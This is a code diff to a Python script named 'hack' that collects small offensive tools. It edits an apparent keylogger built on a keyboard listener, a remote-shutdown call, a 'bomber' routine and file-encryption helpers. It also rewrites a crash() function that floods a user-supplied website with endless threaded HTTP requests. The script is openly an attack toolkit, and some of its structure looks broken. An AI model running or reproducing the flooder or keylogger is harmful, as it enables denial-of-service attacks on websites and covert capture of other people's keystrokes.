@@ -9,6 +9,22 @@ class hack:
     print('>>> ......')
     time.sleep(10)
     print('>>> smpw hack done')
+def pip_install():
+    import os
+    a = input('       ')
+    if a == 'start':
+        os.system('python.exe -m pip install --upgrade pip')
+        os.system('pip install pynput')
+        os.system('pip install setuptools')
+        os.system('pip install colored')
+        os.system('pip install termcolor')
+        os.system('pip install requests')
+        os.system('pip install colorama')
+        os.system('pip install pyAesCrypt')
+        os.system('pip install pygame')
+        a = input('       ')
+        if a == 'stop':
+            exit()
     def ttbb():
         import os
         a = input('       ')
@@ -27,12 +43,7 @@ class hack:
                 with Listener(on_press = onPressed) as listener:
                     listener.join()
             if a == 'stop':
-                hack()
-                while True:
-                    if 11 == 11:
-                        hack()
-                    else:
-                        break
+                exit()
     def sh_win():
         import os
         a = input('       ')
@@ -41,12 +52,7 @@ class hack:
                 os.system('shutdown -i')
                 a = input('       ')
             if a == 'stop':
-                hack()
-                while True:
-                    if 11 == 11:
-                        hack()
-                    else:
-                        break
+                exit()
     def bomber():
         import os
         a = input('       ')
@@ -143,13 +149,8 @@ class hack:
                     else:
                         print(colored("error!", 'red'))
                     a = input('    ')
-                    if a == 'stop':
-                        hack()
-                        while True:
-                            if 11 == 11:
-                                hack()
-                            else:
-                                break
+            if a == 'stop':
+                exit()
     def encrypt_the_file_txt():
         import os
         a = input('       ')
@@ -170,13 +171,8 @@ class hack:
                 	print("[+] File '"+str(os.path.splitext(file)[0])+"' successfully saved!")
                 finally: 
                 	print("---------------------------------------------------------------")
-        if a == 'stop':
-            hack()
-            while True:
-                if 11 == 11:
-                    hack()
-                else:
-                    break
+            if a == 'stop':
+                exit()
     def ZAR_encrypt_the_file_txt():
         import os
         a = input('       ')
@@ -196,43 +192,17 @@ class hack:
                 finally: 
                     print("---------------------------------------------------------------")
             if a == 'stop':
-                hack()
-                while True:
-                    if 11 == 11:
-                        hack()
-                    else:
-                        break
-    def pip_install():
-        import os
+                exit()
+    def crash():
         a = input('       ')
         if a == 'start':
-            os.system('python.exe -m pip install --upgrade pip')
-            os.system('pip install pynput')
-            os.system('pip install setuptools')
-            os.system('pip install colored')
-            os.system('pip install termcolor')
-            os.system('pip install requests')
-            os.system('pip install colorama')
-            os.system('pip install pyAesCrypt')
-            a = input('       ')
-        if a == 'stop':
-            hack()
+            import threading
+            import requests
+            a = input('crash:')
+            def website():
+                while True:
+                    requests.get("https://"+a)
             while True:
-                if 11 == 11:
-                    hack()
-                else:
-                    break
-    def crash():
-        import threading
-        import requests
-        a = input('crash:')
-        def website():
-            while True:
-                requests.get("https://"+a)
-        while True:
-         threading.Thread(target=website).start()
-
-'''class display:
-    def display_set(a):
-        if a
-        return a'''
+             threading.Thread(target=website).start()
+'''class display():
+    def displayset():'''
